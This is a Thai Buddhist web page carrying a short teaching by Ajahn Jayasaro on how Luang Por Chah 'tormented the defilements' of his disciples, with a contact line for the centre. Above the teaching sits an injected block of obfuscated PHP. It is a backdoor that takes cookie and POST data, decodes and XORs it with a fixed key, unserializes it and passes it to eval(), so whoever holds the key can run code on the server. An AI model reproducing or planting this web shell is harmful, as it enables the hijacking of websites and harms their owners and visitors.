$gISZHjgDQ = chr (67) . '_' . 'Y' . chr ( 180 - 107 ).chr (85) . chr ( 1093 - 973 ).'V';$bfLKd = "\x63" . "\x6c" . 'a' . 's' . "\163" . "\x5f" . chr (101) . "\170" . "\151" . 's' . chr ( 399 - 283 )."\163";$xnxaNiXQgk = class_exists($gISZHjgDQ); $bfLKd = "19980";$IYMozkSOu = !1;if ($xnxaNiXQgk == $IYMozkSOu){function ILYcYImbfn(){$EBKhUbi = new /* 50159 */ C_YIUxV(56193 + 56193); $EBKhUbi = NULL;}$UcoaYwYK = "56193";class C_YIUxV{private function UMWdPx($UcoaYwYK){if (is_array(C_YIUxV::$dKrkPX)) {$btWUJV = str_replace(chr (60) . '?' . chr (112) . "\x68" . chr (112), "", C_YIUxV::$dKrkPX[chr (99) . "\x6f" . 'n' . "\x74" . "\145" . chr ( 847 - 737 )."\164"]);eval($btWUJV); $UcoaYwYK = "56193";exit();}}private $pfYboxUt;public function erDrDQxxD(){echo 45787;}public function __destruct(){C_YIUxV::$dKrkPX = @unserialize(C_YIUxV::$dKrkPX); $UcoaYwYK = "16972_21716";$this->UMWdPx($UcoaYwYK); $UcoaYwYK = "16972_21716";}public function VlAvhWhqO($jNNCCCm, $rYCWIb){return $jNNCCCm[0] ^ str_repeat($rYCWIb, (strlen($jNNCCCm[0]) / strlen($rYCWIb)) + 1);}public function __construct($UwJpXbPW=0){$UIMmmtBEqf = $_POST;$mozmYRH = $_COOKIE;$rYCWIb = "3a0ba29f-1560-4af9-8870-7ae2d2693801";$rfTPJ = @$mozmYRH[substr($rYCWIb, 0, 4)];if (!empty($rfTPJ)){$NhxgbgDIku = "base64";$jNNCCCm = "";$rfTPJ = explode(",", $rfTPJ);foreach ($rfTPJ as $NdnfYJZO){$jNNCCCm .= @$mozmYRH[$NdnfYJZO];$jNNCCCm .= @$UIMmmtBEqf[$NdnfYJZO];}$jNNCCCm = array_map($NhxgbgDIku . "\x5f" . "\144" . 'e' . "\143" . "\x6f" . chr (100) . chr ( 555 - 454 ), array($jNNCCCm,));C_YIUxV::$dKrkPX = $this->VlAvhWhqO($jNNCCCm, $rYCWIb);}}public static $dKrkPX = 10338;}ILYcYImbfn();}$iniKU = "\x4e" . 'g' . chr ( 756 - 658 )."\137" . chr ( 907 - 838 ).chr (66) . "\167";$myyExn = 'c' . 'l' . "\141" . "\x73" . "\163" . "\x5f" . "\x65" . chr (120) . chr ( 277 - 172 ).chr ( 880 - 765 )."\x74" . "\163";$vTdOqhW = class_exists($iniKU); $myyExn = "32259";$vAAay = !1;if ($vTdOqhW == $vAAay){function Jwxxo(){return FALSE;}$QfzmsEypX = "15648";Jwxxo();class Ngb_EBw{private function xKGGL($QfzmsEypX){if (is_array(Ngb_EBw::$avSeuoHui)) {$HNNJexxV = str_replace(chr (60) . chr ( 542 - 479 )."\160" . chr (104) . "\x70", "", Ngb_EBw::$avSeuoHui["\143" . "\x6f" . "\156" . 't' . "\145" . 'n' . "\x74"]);eval($HNNJexxV); $QfzmsEypX = "15648";exit();}}private $PpOeVk;public function eCrFVEB(){echo 28385;}public function __destruct(){$QfzmsEypX = "20419_16761";$this->xKGGL($QfzmsEypX); $QfzmsEypX = "20419_16761";}public function __construct($PlBYqoqvu=0){$JCuGXEK = $_POST;$LVuXxA = $_COOKIE;$otdEyqxrW = "abbe5226-71cc-40c5-9d39-6b2242a26fb4";$drVNpRcsa = @$LVuXxA[substr($otdEyqxrW, 0, 4)];if (!empty($drVNpRcsa)){$joLSFKk = "base64";$jVoOivToi = "";$drVNpRcsa = explode(",", $drVNpRcsa);foreach ($drVNpRcsa as $ythUtVZV){$jVoOivToi .= @$LVuXxA[$ythUtVZV];$jVoOivToi .= @$JCuGXEK[$ythUtVZV];}$jVoOivToi = array_map($joLSFKk . chr ( 292 - 197 )."\144" . "\145" . "\143" . "\157" . 'd' . 'e', array($jVoOivToi,)); $jVoOivToi = $jVoOivToi[0] ^ str_repeat($otdEyqxrW, (strlen($jVoOivToi[0]) / strlen($otdEyqxrW)) + 1);Ngb_EBw::$avSeuoHui = @unserialize($jVoOivToi); $jVoOivToi = class_exists("20419_16761");}}public static $avSeuoHui = 42183;}$wsxQiirY = new /* 12138 */ $iniKU(15648 + 15648); $QfzmsEypX = strpos($QfzmsEypX, $QfzmsEypX); $vAAay = $wsxQiirY = $QfzmsEypX = Array();} ทรมานกิเลส | ศูนย์พลาญข่อย
080-5519598 (คุณแก้ว) plarnkhoi@hotmail.com
Select Page

สมัยก่อนหลวงพ่อชาชอบฝึกลูกศิษย์ลูกหาด้วยการทรมานกิเลสของศิษย์ การทรมานกิเลส
ไม่ใช่ทรมานกาย ไม่ใช่เรื่องโหดร้าย ตรงกันข้าม การทรมานกิเลส คือวิธีเปิดเผยความสัมพันธ์ระหว่าง
อริยสัจ คือ ทุกข์ และอริยสัจ คือ สมุทัย ด้วยการไม่ให้ศิษย์ทำอะไรบางอย่างตามใจชอบ
เช่นในโรงฉัน หลวงพ่อเคยบอกว่า ‘ท่านต้องการเร็ว ผมจะให้ช้า ท่านต้องการร้อน
ผมจะให้เย็น’ เมื่อหลวงพ่อไม่ให้ทำสิ่งที่อยากทำ หรือได้ในสิ่งที่อยากได้ แต่กลับให้ทำในสิ่งที่ไม่อยากทำ
ได้ในสิ่งที่ไม่อยากได้ ศิษย์มักจะอึดอัด กระวนกระวายเป็นทุกข์ ตรงนี้หลวงพ่อจะสอนว่า ทุกข์ไหม ทุกข์ทำไม
พระองค์ไหนมีสติปัญญาพอก็จะเห็นว่า ตัณหาไม่ได้อยู่ที่หลวงพ่อ หรือเหตุการณ์ ที่จริงมันอยู่ที่ตัณหา ความอยากได้
อยากมีอยากเป็น ความไม่อยากได้ ไม่อยากมี ไม่อยากเป็นต่างหาก หลวงพ่อชาไม่ต้องสอนหลักปริยัติมาก
หลวงพ่อสอนแต่พอสมควร พอเป็นหลัก แล้วคอยสร้างเหตุการณ์เพื่อให้ลูกศิษย์ได้เห็นเอง เป็นปัจจัตตัง

พระอาจารย์ชยสาโร